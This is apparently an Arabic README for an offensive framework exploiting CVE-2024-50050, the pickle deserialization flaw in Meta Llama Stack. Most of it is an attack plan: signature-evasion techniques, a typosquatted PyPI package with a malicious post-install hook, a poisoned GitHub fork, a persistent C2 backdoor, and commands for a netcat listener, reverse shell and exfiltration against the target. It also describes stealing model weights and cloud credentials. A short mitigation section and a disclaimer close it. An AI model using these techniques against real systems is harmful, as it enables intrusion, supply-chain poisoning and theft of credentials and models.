
LlamaStack-RCE: إطار عمل حتمي لاستغلال سلسلة التوريد وتحصينها [CVE-2024-50050] التركيز على أبحاث أمن الذكاء الاصطناعي AI-SupplyChain-Poisoning: مختبر متقدم للتلاعب بـ Opcode الخاص بـ PVM وحقن ZeroMQ
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE هو إطار محاكاة واستغلال عالي الدقة يستهدف CVE-2024-50050، وهي ثغرة حرجة لتنفيذ الأكواد عن بُعد (RCE) في Meta Llama Stack. تنبع الثغرة من إلغاء التسلسل غير الآمن داخل واجهة الاستدلال المبنية على بايثون، وتحديدًا من خلال استخدام وحدة pickle عبر طبقات نقل ZeroMQ (0MQ).
يوفر هذا المستودع سلسلة الهجوم الكاملة، بدءًا من تسميم سلسلة التوريد في المراحل العليا وصولًا إلى التنفيذ في المراحل الدنيا وسرقة أوزان النماذج.
يستهدف جوهر الاستغلال آلة Pickle الافتراضية (PVM). من خلال استخدام opcode الخاص بـ GLOBAL، يمكننا إجبار PVM على استيراد أي وحدة بايثون متاحة وتنفيذ دوال عشوائية أثناء عملية unpickling.
متجه الهجوم: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
لتجاوز أنظمة كشف التسلل التقليدية القائمة على التوقيعات (Snort/Suricata)، يطبّق الإطار تشفيرًا متعدد الأشكال:
التنفيذ المتداخل عبر Base64: تغليف أوامر الصدفة داخل Base64 لإخفاء السلاسل الحرفية مثل /bin/bash أو os.system.
إخفاء Opcode: إعادة ترتيب تعليمات PVM لتغيير التوقيعات الثنائية دون تغيير منطق التنفيذ.
تهريب الحزم: تجزئة حمولة pickle إلى عدة إطارات ZeroMQ لتجنب اكتشاف الحالات الشاذة القائمة على الحجم.
يحاكي الإطار تسليحًا شاملاً لسلسلة التوريد:
| المرحلة | الاستراتيجية | التنفيذ التقني |
|---|---|---|
| I: المراحل العليا | الانتحال الكتابي (Typosquatting) | تسجيل حزمة metalama-stack على PyPI مع أمر PostInstallCommand خبيث في setup.py. |
|
| II: التوزيع | Fork مسموم | Fork عالي الأداء لـ Llama Stack على GitHub مع "مفسر Pickle خفي" في connection.py.
|
| III: التنفيذ | Trigger عبر CI/CD | تنفيذ تلقائي أثناء pip install في بيئة Jenkins/GitHub Actions الخاصة بالهدف.
| | IV: الاستمرارية | قنبلة منطقية | برنامج تخديم خلفي متعدد المراحل للوصول طويل الأمد إلى C2 وسرقة النماذج.
|
المعدات: 4x NVIDIA A100/H100 (لاختبار الأوزان محليًا).
نظام التشغيل: Arch Linux مُحصّن أو Kali Linux.
البيئة: Docker و Docker-Compose (شبكة معزولة).
.
├── lab_validator.py # مجموعة تحقق آلية من 7 مراحل
├── exploit_cve_2024_50050.py # إطار الاستغلال الرئيسي
├── server.py # محاكاة Llama Stack القابل للاستغلال
├── setup.py # مثبّت سلسلة التوريد المُسلّح
├── post_exploit.py # جمع البيانات والتحرك الجانبي
└── evasion_library.py # 12+ طريقة تهرب متقدمة
python lab_validator.py # الهدف: تحقيق معدل نجاح 100%
nc -lvnp 4444
python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python
python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil
الاستغلال الناجح يمنح سيطرة مطلقة على البنية التحتية للذكاء الاصطناعي:
سرقة الملكية الفكرية: سرقة أوزان النماذج .safetensors (بما تتراوح قيمته بين 10 ملايين و100 مليون دولار أمريكي أو أكثر).
اختطاف وحدات معالجة الرسوميات: تخصيص غير مصرح به لموارد CUDA لأغراض تعدين العملات الرقمية (Cryptojacking) أو التدريب الخفي (Shadow Training).
التلاعب بالاستدلال: تسميم استجابات النماذج لإحداث أعطال منهجية في التطبيقات الهابطة (ذكاء اصطناعي طبي/قانوني).
حصاد بيانات الاعتماد: استخراج مفاتيح AWS/GCP وإعدادات K8s من /proc/self/environ.
للتخفيف من CVE-2024-50050، يجب تطبيق القواعد المطلقة التالية:
استئصال Pickle: استبدال جميع استدعاءات pickle.loads() بـ safetensors.torch.load_file() أو msgpack مع مخطط صارم.
تحصين ZMQ: تنفيذ ZMQ_CURVE مع أزواج المفاتيح العامة/الخاصة وعدم الربط أبدًا على 0.0.0.0.
عزل البنية التحتية: تشغيل عمليات الذكاء الاصطناعي داخل gVisor أو Kata Containers لمنع هروب الحاويات عبر RCE.
التقسيم الدقيق للشبكة: عزل خادم الاستدلال عن الإنترنت العام باستخدام قواعد دخول/خروج محددة بدقة.
إشعار قانوني: استخدام هذا الإطار لمهاجمة أهداف دون إذن كتابي مسبق يعد غير قانوني. تم توفيره لأغراض تعليمية واختبار الاختراق المصرح به فقط. المؤلف (Sastra_Adi_Wiguna) لا يتحمل أي مسؤولية عن سوء الاستخدام.
وثيقة مصنفة: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 الحالة الحتمية: جاهز للإنتاج (98/100)